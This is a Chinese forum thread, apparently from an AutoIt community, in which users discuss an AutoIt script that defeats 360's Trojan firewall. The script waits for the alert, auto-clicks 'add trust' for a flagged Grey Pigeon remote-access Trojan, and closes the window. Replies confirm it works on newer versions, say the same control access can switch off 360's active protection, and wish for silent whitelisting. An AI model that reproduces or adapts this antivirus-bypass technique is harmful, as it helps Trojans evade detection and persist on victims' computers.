【已解决】这样子过360怎么样？

甜茶少年

在测试黑客软件时，发现360木马防火墙的控件可读。于是写了如下代码：

WinWaitActive("[CLASS:Q360HIPSClass]")
ControlClick("[CLASS:Q360HIPSClass]","","[CLASS:AfxWnd90su; INSTANCE:2]") ；对被报黑的程序添加信任
WinWaitActive("360木马防火墙") ；等到360木马防火墙出现
WinClose("360木马防火墙")；关掉它

用户在以后的过程中撤销了对木马文件的信任怎么办？
我的想法就是用winwaitactive.

木马防火墙有两行红色字体，分别是木马名称和木马文件。
木马文件这里是文件的地址，其实地址那里也是个控件。
信息如下：
类名：AfxWnd90su
接口：1
类别名：AfxWnd90su1
高级模式：[CLASS:AfxWnd90su; INSTANCE:1]
ID：105
文本：D:\mytest\hack\灰鸽子奥运版\灰鸽子奥运版.exe

注意到没有，文本这边就是我们的木马所在的路径。
那么，只要我们检测到活动窗口，类名为：Q360HIPSClass 且控件AfxWnd90su文本为D:\mytest\hack\灰鸽子奥运版\灰鸽子奥运版.exe
这就可以知道，是在对我们的程序进行清除，这个时候就用前文的”添加信任“。
这样怎么样。
ps:单次测试效果良好，就是反应速度有点慢，从窗口出现到关闭大概需要1-2秒。

jkq920

请高手研究一下....

xiaowo

前几天我提出过这样的思路，果断还是行得通的，谢谢LZ分享的经验。不过，用这样的方法来干坏事的话，很快就会失效的……

jingygr

这个有意思，可以研究一下，哈哈。

lleheaven

mark一下哈~~~

rain

这个思路很有意思。必要的时候可以采纳！

jtzxgfy

最新版本的360　你的方法都失效　请用最新版本的360　重新试试

夜猫猫

流氓软件的根底........

甜茶少年

回复 7# jtzxgfy

360安全卫士主程序版本8.60.2001，备用木马库2012/7/19
操作系统win7旗舰版

甜茶少年

这是在虚拟机中测试灰鸽子配置的服务端。

360安全卫士主程序版本8.60.2002，备用木马库2012/7/11
操作系统winxp 专业版

甜茶少年

回复 7# jtzxgfy


    经测试最新版本360有效。
不好意思，忘了一行代码给你补上：

WinWaitActive("[CLASS:Q360HIPSClass]")

这个是等待拦截窗口

你说最新版本360失效后回去测试了一下。
你失效的原因有可能是因为是在SciTE中测试。
因为我的代码是检测活动窗口，然后继续执行。
在SciTE中测试时，活动窗口始终是SciTE编译器，代码当然会失效。
你手动点一下拦截窗口试试看。这样子代码就会生效。

甜茶少年

回复 8# 夜猫猫


    用这种方法可以实现对360系列的全面操作，添加白名单，自动退出。
特别的，360杀毒所有操作按钮的控件均可读取，也就是说，可以通过au3实现对360杀毒的全面控制，比如关闭主动防护，这样子的话，真的很令人担心安全性。

甜茶少年

回复 3# xiaowo


只要au3程序自身不被报毒，类似手段就不会失效。

jtzxgfy

谢谢　甜茶少年
但我的　今天想重新测试都不行了，au3编译的　exe都不弹出木马提示了　只弹出　在右下角的　禁止、加入白名单的提示


“在SciTE中测试时，活动窗口始终是SciTE编译器，代码当然会失效。
你手动点一下拦截窗口试试看。这样子代码就会生效”
昨天就这样试过，也不行的，只要弹出木马提示不关它　AU3的鼠标移动　点击等等都失效
　或有空　加我的QQ85222060　交流一下　我2008年　注册学习AU3　应该也懂一点了的
　

li123168

如果能禁止360弹窗，在后台悄悄加白名单就完美了